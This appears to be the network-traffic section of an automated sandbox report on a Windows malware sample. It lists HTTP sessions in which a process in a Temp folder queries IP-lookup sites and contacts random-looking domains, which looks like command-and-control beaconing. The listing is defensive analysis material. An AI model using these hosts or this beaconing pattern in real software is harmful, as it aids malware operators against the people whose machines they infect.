                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    5192.168.11.3049810104.27.206.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:17.770518064 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:17.910665989 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:17 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:17 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PBsClwOL3aahqW32d7klmyx9oN7%2FIaiES8YtIvqPQrKDuHCdw%2BcgoK9ZTuBCf46xexMCkbBayS3zNJnGRawowiXlgN7R%2F8P6uwes5gt5TQsoOXNKWMhXwxse5MMgQo5E0kvjbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3036e47a14d9cd-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    6192.168.11.3049813104.27.206.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:21.207192898 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:21.357883930 CEST853INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:21 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2O07MoaIHPZjjE98ZPBAVQ8vdev6kbuA3S9gdZsKpPEUMYzyqSOuMaVje6OANWV4tFigdnL2MxIgJcE23%2F7YKQblEvWL50wZGio7GW7J7d21y5afwcHmHaFMv1B%2FXsxHknhaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3036f9fc36da77-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    7192.168.11.3049814104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:22.502989054 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:22.660245895 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:37 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=dZg45bLLD2l8r0AyDiHaWvLigxUpqs4pfHy9igHniL0-1728999562-1.0.1.1-LVfrx19PQEpVO3A1uisAp544UCxrU2wyDz7nuGEIYh63jslcHdCLA.5uc4TraQROoVk32qfaO1kefZ7d0baYRA; path=/; expires=Tue, 15-Oct-24 14:09:22 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037020c3725b5-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:22.660382986 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:22.660464048 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:22.660545111 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 30 32 30 63 33 37 32 35 62 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3037020c3725b5</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    8192.168.11.304981534.111.176.156807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:23.981647015 CEST175OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.myspace.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.110925913 CEST213INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                                                    Location: https://www.myspace.com:443/
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    9192.168.11.304981835.164.78.200807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.542615891 CEST176OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: lwbjtptjlzji.net
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.819334030 CEST422INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: btst=434925d89799094820f2aaeb05e3989f|102.129.152.200|1728999564|1728999564|0|1|0; path=/; domain=.lwbjtptjlzji.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                    Set-Cookie: snkz=102.129.152.200; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    10192.168.11.304981931.13.67.35807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.588140011 CEST176OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.718518972 CEST195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Location: https://www.facebook.com/
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Server: proxygen-bolt
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:24 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    11192.168.11.3049820104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.855096102 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.000981092 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:39 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=1nE0UCey8XtG83SYPAw7TF23SwXgTybrKUmmMiZ8e0M-1728999564-1.0.1.1-PCfYTXH3LEo.nqE7uCIKN0ddrNInlSBEOLfH4V_PnTCsBpjRjkju8LAANPKTpCGETJBBwLlIxldfqmyQiiY9GQ; path=/; expires=Tue, 15-Oct-24 14:09:24 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d303710be1eb3cb-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001034975 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001058102 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:25.001080036 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 31 30 62 65 31 65 62 33 63 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d303710be1eb3cb</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    12192.168.11.304982185.214.228.140807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.076550007 CEST173OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: xhjwwgwd.info
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.339117050 CEST132INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Server: nginx/1.27.2
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:26 GMT
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.339226961 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    13192.168.11.3049822104.27.206.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.159084082 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:26.307447910 CEST853INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:26 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:26 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3AsdWbEr6bUiRQLObjqhRityBcCNqZgLrPYzPeYfObTLdUSaFIyUAH24jJhw6pl3%2BAdtjVKWbqvECW9nsCIqKgsKYrYXBlX%2BckYkCmRUHbqIfpvNup2iwMqEaoU9Ek7KRrqrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d303718ef68747e-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    14192.168.11.3049825208.100.26.245807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.034244061 CEST173OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: wsmpvwxb.info
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.201827049 CEST337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 178
                                                                                                                                                                                                                                                    Connection: close
